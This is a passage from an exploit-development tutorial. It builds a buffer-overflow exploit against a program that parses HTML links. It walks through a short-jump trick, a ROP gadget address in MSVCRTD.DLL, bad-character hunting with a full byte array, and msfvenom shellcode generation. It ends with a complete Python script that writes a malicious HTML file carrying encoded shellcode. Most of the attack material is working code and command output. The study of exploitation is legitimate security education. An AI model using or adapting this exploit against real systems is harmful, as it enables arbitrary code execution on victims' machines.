But now we jump to an address 4 bytes before the EIP override. That is really not enough space for all the shellcode. We need another little trick to jump to jump a few bytes behind. To quickly play (assemble / disassemble) with ASM instructions this website can be helpfull: https://defuse.ca/online-x86-assembler.htm#disassembly2

After some research I found this website: https://thestarman.pcministry.com/asm/2bytejumps.htm which discusses two-byte JMP instructions. In the end we just need the short jump instruction plus the offset we want to jump. In our case the necessary bytes are: eb 16.

Lets place \x16\xeb\x90\x90 right before the gadget address. To write raw bytes to a file we can use python.

import sys; 
sys.stdout.buffer.write(b"\x90\x90")

At the moment our exploit looks like this:

import sys

pre = b"""<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

"""
pre += b"<a"

# dont know why exactly 
# but we need a link before the BOF
# and it has to have at least 252 spaces to work 
pre += b" "*252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A"*1872

# short jump forward behind overflow
link += b"\x90\x90\xeb\x04" 

# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"

# nop buffer and Stop
link += b"\x90\x90\x90\x90\xCC"

# this is also needed for exploit to work, think of the first crash in dll
link += b"A"*2000

link += b"\"></a>"

post = b"""
</body>
</html>
"""

html = pre + link + post

sys.stdout.buffer.write(html)

Let's try it:

Works like a charm

Time to place the shellcode. To generate shellcode we simply use the classic msfvenom pop calc method. Let's also directly exclude null bytes and format to C output to expanf our exploit script.

└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
x86/shikata_ga_nai chosen with final size 220
Payload size: 220 bytes
Final size of c file: 952 bytes
unsigned char buf[] = 
"\xbe\xfa\xf5\xdc\xb1\xdd\xc2\xd9\x74\x24\xf4\x5d\x29\xc9"
"\xb1\x31\x83\xed\xfc\x31\x75\x0f\x03\x75\xf5\x17\x29\x4d"
"\xe1\x5a\xd2\xae\xf1\x3a\x5a\x4b\xc0\x7a\x38\x1f\x72\x4b"
"\x4a\x4d\x7e\x20\x1e\x66\xf5\x44\xb7\x89\xbe\xe3\xe1\xa4"
"\x3f\x5f\xd1\xa7\xc3\xa2\x06\x08\xfa\x6c\x5b\x49\x3b\x90"
"\x96\x1b\x94\xde\x05\x8c\x91\xab\x95\x27\xe9\x3a\x9e\xd4"
"\xb9\x3d\x8f\x4a\xb2\x67\x0f\x6c\x17\x1c\x06\x76\x74\x19"
"\xd0\x0d\x4e\xd5\xe3\xc7\x9f\x16\x4f\x26\x10\xe5\x91\x6e"
"\x96\x16\xe4\x86\xe5\xab\xff\x5c\x94\x77\x75\x47\x3e\xf3"
"\x2d\xa3\xbf\xd0\xa8\x20\xb3\x9d\xbf\x6f\xd7\x20\x13\x04"
"\xe3\xa9\x92\xcb\x62\xe9\xb0\xcf\x2f\xa9\xd9\x56\x95\x1c"
"\xe5\x89\x76\xc0\x43\xc1\x9a\x15\xfe\x88\xf0\xe8\x8c\xb6"
"\xb6\xeb\x8e\xb8\xe6\x83\xbf\x33\x69\xd3\x3f\x96\xce\x2b"
"\x0a\xbb\x66\xa4\xd3\x29\x3b\xa9\xe3\x87\x7f\xd4\x67\x22"
"\xff\x23\x77\x47\xfa\x68\x3f\xbb\x76\xe0\xaa\xbb\x25\x01"
"\xff\xdf\xa8\x91\x63\x0e\x4f\x12\x01\x4e";

Unfortunately that doesn't work...

In the debugger it looks like the shellcode gets destroyed. The application overwrites the buffer during execution again.

After a bit of try and error I found the solution. Since the programm excpects to parse a link all URL or HTML meta characters are bad. The shellcode breaks if it has bytes in it that translate to for example these ascii: "#'? > and also linebreaks (0d or 0a).

To get all bad chars we can just create all possible hex values and use them as shellcode. Then inspect the buffer and remove the bad chars. Unfortunately, this is a somewhat manual and annoying process.

b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

But in the end we come up with this:

└─$ msfvenom -a x86 -p windows/exec cmd=calc.exe -b "\x00\xff\x0a\x0d\x22\x23\x27\x3e\x3f" -f c

The final exploit looks like this:

import sys

pre = b"""<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Test</title>
</head>
<body>

"""
pre += b"<a"

# dont know why exactly 
# but we need a link before the BOF
# and it has to have at least 252 spaces to work 
pre += b" "*252
pre += b"href=\"dummy\"></a>\""

link = b"<a href=\""
link += b"A"*1872

# short jump forward behind overflow
link += b"\x90\x90\xeb\x04" 

# jump to rop gadget in MSVCRTD.DLL
# 0x10217b07 : pop esi ; pop edi ; ret
link += b"\x07\x7b\x21\x10"

# nop buffer
link += b"\x90\x90\x90\x90"

# shellcode
# bad 00 0a 0d 22 23 27 3e 3f

link += b"\xdb\xdb\xba\x60\xe1\xe5\x4b\xd9\x74\x24\xf4\x58\x29\xc9"
link += b"\xb1\x31\x31\x50\x18\x83\xe8\xfc\x03\x50\x74\x03\x10\xb7"
link += b"\x9c\x41\xdb\x48\x5c\x26\x55\xad\x6d\x66\x01\xa5\xdd\x56"
link += b"\x41\xeb\xd1\x1d\x07\x18\x62\x53\x80\x2f\xc3\xde\xf6\x1e"
link += b"\xd4\x73\xca\x01\x56\x8e\x1f\xe2\x67\x41\x52\xe3\xa0\xbc"
link += b"\x9f\xb1\x79\xca\x32\x26\x0e\x86\x8e\xcd\x5c\x06\x97\x32"
link += b"\x14\x29\xb6\xe4\x2f\x70\x18\x06\xfc\x08\x11\x10\xe1\x35"
link += b"\xeb\xab\xd1\xc2\xea\x7d\x28\x2a\x40\x40\x85\xd9\x98\x84"
link += b"\x21\x02\xef\xfc\x52\xbf\xe8\x3a\x29\x1b\x7c\xd9\x89\xe8"
link += b"\x26\x05\x28\x3c\xb0\xce\x26\x89\xb6\x89\x2a\x0c\x1a\xa2"
link += b"\x56\x85\x9d\x65\xdf\xdd\xb9\xa1\x84\x86\xa0\xf0\x60\x68"
link += b"\xdc\xe3\xcb\xd5\x78\x6f\xe1\x02\xf1\x32\x6f\xd4\x87\x48"
link += b"\xdd\xd6\x97\x52\x71\xbf\xa6\xd9\x1e\xb8\x36\x08\x5b\x36"
link += b"\x7d\x11\xcd\xdf\xd8\xc3\x4c\x82\xda\x39\x92\xbb\x58\xc8"
link += b"\x6a\x38\x40\xb9\x6f\x04\xc6\x51\x1d\x15\xa3\x55\xb2\x16"
link += b"\xe6\x35\x55\x85\x6a\x94\xf0\x2d\x08\xe8"

# nop buffer
link += b"\x90\x90\x90\x90"

# this is also needed for exploit to work, think of the first crash in dll
link += b"A"*1500

link += b"\"></a>"

post = b"""
</body>
</html>
"""

html = pre + link + post

sys.stdout.buffer.write(html)

Let's see it in action: